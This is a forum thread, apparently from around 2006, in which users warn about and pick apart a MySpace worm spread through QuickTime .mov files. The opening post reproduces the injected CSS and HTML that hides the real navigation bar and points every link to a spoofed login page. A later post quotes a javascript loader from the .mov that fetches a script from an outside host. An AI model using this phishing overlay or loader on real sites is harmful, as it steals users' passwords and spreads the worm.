Urgent! New myspace exploit


Recommended Posts

anyone use myspace? just tonight on a bunch of profiles i see this quicktime .mov file appearing everywhere.

Well it automatically plays and as soon as i view my homepage it has appeared on mine. Anyways what it bassically does is change all the links on the myspace layouts to link to http://almobty.com/css/login.html which is obviously a spoofed myspace login page and MANY people will fall for this. this is obviously trying to steal passwords and isnt just a proof of concept like some past myspace exploits.

You can easily get rid of this by removing the code in your movies sections and removing the junk code in about me section which changes the links.

Im not coder but here is the code :(maybe someone could examine it?)

About Me:

<style type="text/css">
div table td font { display: none }
div div table tr td a.navbar, div div table tr td font { display: none }
.testnav { position:absolute; top: 136px; left:50%; _top: 146px }
</style><div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style=""><a href="http://almobty.com/css/login.html" target="" class="navbar">Home</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Browse</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Search</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Invite</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Film</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Mail</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Blog</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Favorites</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Forum</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Groups</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Events</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Videos</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Music</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Comedy</a> | <a href="http://almobty.com/css/login.html" target="" class="navbar">Classifieds</a></div></div>

Movies

<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src=http://almobty.com/css/piAF2iuswo.mov /></div>

The problem is as soon as you visit another profile with it, it comes back and its spreading like wildfire, so maybe remove and keep a low profile for the time being?

http://almobty.com appears to be a foreign website for contracting

Im running firefox 2 (so doesnt only effect IE)

Here is an example:

2005207505678579756_th.jpg

Edited by kaneso
  • Like 1
Link to comment
https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/
Share on other sites

Theres alot of this crap around lately to do with Myspace...thats why I have stayed away from them and been using Facebook...my mates myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:(

Looking at the code, it is meant to redo the entire thing... basically redo your entire profile. But there is code in it that does nothing. I think someone modified a hack from the past, and it's gotten out of control.

That imageshack photo is kinda odd... eh?

it is a redirect exploit seemingly enough, the mov is used as means of spreading it adds the css code into your profile and uses it to phish you. That sall, and as far as the site it is being hosted on odds are it is a hacked server, what i would be worried about is if someone takes the spread code and uses it for something else. Thkn abotu it if they are able to get the code to edit yoru profile with a mov file just what else could be done with this

heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ?

also, http://almobty.com DNS info:

Name Servers:

NS1.ALL-SOLUTION.NET

NS2.ALL-SOLUTION.NET

Technical Contact:

Almobty Co.

Al-Mobty Company for contracting ([email protected])

+966.4658695

Fax: +966.4659242

Olaya Street, POBox 7705 Riyadh 11472,

Tel. 966-1-4658695 & Fax. 4659242

RIYADH, 11472

SA

Damn, thats a good hacker :)

part source of QT file:

<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...

Edited by n_K

heh, all movies from myspace are down. myspace is crap anyway, why do people still use it ?

also, http://almobty.com DNS info:

Name Servers:

NS1.ALL-SOLUTION.NET

NS2.ALL-SOLUTION.NET

Technical Contact:

Almobty Co.

Al-Mobty Company for contracting ([email protected])

+966.4658695

Fax: +966.4659242

Olaya Street, POBox 7705 Riyadh 11472,

Tel. 966-1-4658695 & Fax. 4659242

RIYADH, 11472

SA

Damn, thats a good hacker :)

part source of QT file:

<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...

If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id.

If you uses a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have download the js.js and looked at the code it just seem try to write over your formating and the it spams every 6 sec. to random id.

yeh, but it writes the javascript through the quicktime file so open the quicktime .mov in notepad, look at the binary followed by "apple text writer plugin"

I got this, Does the users PC become infected with anything?

When I view my profile and click home I get re directed to

http://www.../images/login.html

Which doesnt go anywhere obviously, Has this thing installed anything on my PC?

Edited by Sawyer12
  • 1 month later...

This has actually been around for a while. I took note of it back in October and thought nothing of it. I even warned people about this .mov exploit and nobody really listened. I guess I should have posted something here, eh? :laugh: . This has happened to me twice now, and yes, I know how to get rid of it. But I'm tired of the insecure status of Myspace, and therefore have deleted my account.

I'm glad someone made this public, as it should be addressed to both Myspace and the people who use it.

Everyone who has contributed to this thread thus far has explained the majority of this exploit. There are several sources of the .mov and I don't think this will be fixed for a while. I suggest that you leave Myspace as soon as possible, people. I'm actually glad this happened to me more than once; now I won't be wasting any MORE time. :laugh:. It's only going to get worse from here on, and we can't really do anything about it.

Ah well. I guess that's how it goes... :p

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • I don't understand the vision. Do people really want to buy a new computer from Dell with 6 browsers installed? We all keep asking for Microsoft to stop having so much junk on their OS, and adding a bunch of browsers seems to go against that. Ideally, we would just be asked what browser we want during OOBE but Google is just going to pay Dell a bunch of money to include Chrome. Additionally, would you want your phones to start including all the browsers too when you get them? The only thing I ever wanted was to be able to uninstall IE or edge and I believe you are now able to. I do agree that microsoft needs to chill with their "are you sure you don't want to try edge before you install chrome" ads when going to download chrome.
    • The funny thing here is that like 70% or so of the web browser users use 'Google Chrome' as web browser. What I don't understand is that why on earth would ANYONE choose 'Google Chrome' on Windows when 'Microsoft Edge' is not just better in most things, but it's already there right out of the box for the Windows users. Microsoft Edge has less data collection (yes, that's a fact), less RAM usage and is more optimized for Windows (as it's a Microsoft product) right out of the box. I'm sure you will come with the argument of bloat in Microsoft Edge. Sure, but most of that can be fixed with a simple tool (there are many good ones out there for this). Yes, that require a couple of clicks in the same way as it requires several clicks to install 'Google Chrome'. And I'm sure you really love the 4 GB of AI-slop data 'Google Chrome' is downloading for Chrome without you agreeing to it. Fun right? Sure, the way Microsoft is pushing 'Microsoft Edge' on users might not be the best way of doing it and might need to change. But I would never choose 'Google Chrome' over 'Microsoft Edge' today anyways. I'm sure there was a period back in the days when 'Google Chrome' actually was better in most things, but that period is not today.
    • JetBrains rolls out IntelliJ IDEA update with Markdown preview fixes and more by David Uzondu Image via JetBrains IntelliJ 2026.1.3 from JetBrains has landed, bringing several highly requested bug fixes that target common UI glitches and terminal rendering issues. If you run tmux inside the integrated terminal, the IDE no longer renders the cursor above the active line. The Markdown preview bug, which was fixed in this release, had annoyed developers for quite some time, as the preview pane failed to render images saved outside the project directory. Instead of displaying the actual image, the IDE simply showed a broken image icon, a problem that stuck around for two years before this update. Over on Windows, developers running WSL can now use wsl.exe to spin up their environments without losing terminal functionality. In previous builds, launching a terminal shell with something like wsl.exe -d ubuntu inside a Windows-based project broke both shell integration and active process detection. Other bug fixes in this release include: An issue where Gradle sync incorrectly reported success as a failure on WSL when using Gradle 9.5.0. A syntax highlighting bug that flagged valid Java for-loop initialization blocks with multiple statements as incorrect. A warning bug that triggered a false non-null local variable alert when using JSpecify annotations. A database generation bug that hid the option to use a DELETE statement instead of a TRUNCATE checkbox. A Kotlin highlighting failure where an assertion error in the Gradle redundant library inspection broke error highlighting. A UI bug where the ComboBox popup lacked a maximum height restriction. A Snowflake syntax error where DataGrip failed to support the "create temp" command. A Svelte syntax parsing failure that incorrectly flagged quotes inside inline expressions. A VCS repository manager deadlock that triggered thread pool exhaustion. A memory leak where the LazyTree component kept all previous versions of a tree in memory. IntelliJ 2026.1.3 is the third bug fix release for the IntelliJ 2026.1 series. The first one landed back in April with a fix for the WSL Python interpreter freeze, another fix for guest participants using Emmet abbreviations, and corrected WildFly server deployment errors.
    • That stupid annoying Sign in with Google on all these sites now... get the fk outta here
  • Recent Achievements

    • Collaborator
      Asgardi earned a badge
      Collaborator
    • Conversation Starter
      mobandz earned a badge
      Conversation Starter
    • Apprentice
      fernan99 went up a rank
      Apprentice
    • One Month Later
      nothanks earned a badge
      One Month Later
    • One Month Later
      B2Proxy earned a badge
      One Month Later
  • Popular Contributors

    1. 1
      +primortal
      469
    2. 2
      PsYcHoKiLLa
      243
    3. 3
      Skyfrog
      79
    4. 4
      FloatingFatMan
      73
    5. 5
      Michael Scrip
      60
  • Tell a friend

    Love Neowin? Tell a friend!